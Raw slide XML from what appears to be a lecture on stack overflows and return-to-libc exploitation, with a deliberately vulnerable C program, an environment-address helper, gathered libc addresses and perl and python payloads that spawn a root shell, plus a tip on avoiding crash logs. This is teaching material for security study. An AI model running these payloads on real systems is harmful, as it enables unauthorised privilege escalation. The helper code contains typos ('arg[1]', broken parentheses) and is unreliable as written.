              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sh-3.2#</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rPr lang="en"/>
              <a:t>or use python:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ ./auth_overflow2 $(python -c "print '\xc7\xf9\xff\xbf'*40")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Shape 628"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2090400" x="4765125"/>
            <a:ext cy="1816799" cx="3515400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>^ Remember, x86 architecture is little endian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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Shape 633"/>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Demo #2 walkthrough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Shape 634"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600451" x="685800"/>
            <a:ext cy="900599" cx="6400799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ret to lib c</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Shape 639"/>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vuln.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Shape 64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Provided by the HAOE book.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Really simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int main(int argc, char *argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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char buffer[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	strcpy(buffer, argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>We're going to demonstrate return to libc with this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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 64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getenvaddr.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 64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Provided by the HAOE book.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lets you find where on the stack an env variable is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We're going to use it to find our "    /bin/sh" string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;stdlib.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;string.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	char *ptr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	if(argc &lt; 3) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>		printf("Usage: %s &lt;environment variable&gt; &lt;target program&gt;, argv[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>		exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	ptr = getenv(arg[1]); /*get env var location */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	ptr += (strlen(argv[0] - strlen(argv[2]))*2; /*adjust for program name */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>	printf ("%s will be at %p\n", arg[1], ptr);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Shape 65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What we need to do</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Shape 65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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Find the address of system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Find the address of exit()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>if we want it to be clean (will seg fault otherwise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>seg faults can leave logs!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Find the address of "    /bin/sh" on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>we're going to do this to put it in the environmental variables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>export BINSH="    /bin/sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Locate the RET value on the vulnerable program's stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRP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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Shape 65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Find system() and exit()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Shape 65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int main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>system();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exit();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use GDB to find their addresses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Exploitation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Shape 12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
              <a:t>The computer industry has a bad habit of repeating old mistakes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-419100" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" lang="en"/>
              <a:t>Driven by market forces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-419100" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" lang="en"/>
              <a:t>Android OS’s did not learn from past 20 years of security in operating systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-419100" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" lang="en"/>
              <a:t>terrible permissions controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000" i="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Shape 663"/>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Have all the addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Shape 664"/>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system = 0xb7ed0d80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exit = 0xb7ec68f0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pointer to "/bin/sh" = 0xbffffe5d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>These may differ for you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Now to find the RET value on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can do it by binary fuzzing, or examining the stack values with GDB</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Shape 669"/>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the ret-to-libc exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670" name="Shape 670"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704688" x="152400"/>
            <a:ext cy="4840199" cx="8748300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>$ ./vuln $(perl -e 'print "ABCD"x7 . '\x80\x0d\xed\xb7\xf0\x68\xec\xb7\x5b\xfe\xff\xbf"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Should give us:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sh-3.2#</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="Shape 67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Example to tweak</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Shape 67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#include &lt;stdio.h&gt;</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#include &lt;stdlib.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRP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int i = 5; //Global variables</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int j;</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char msg[] = "WARNING!\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
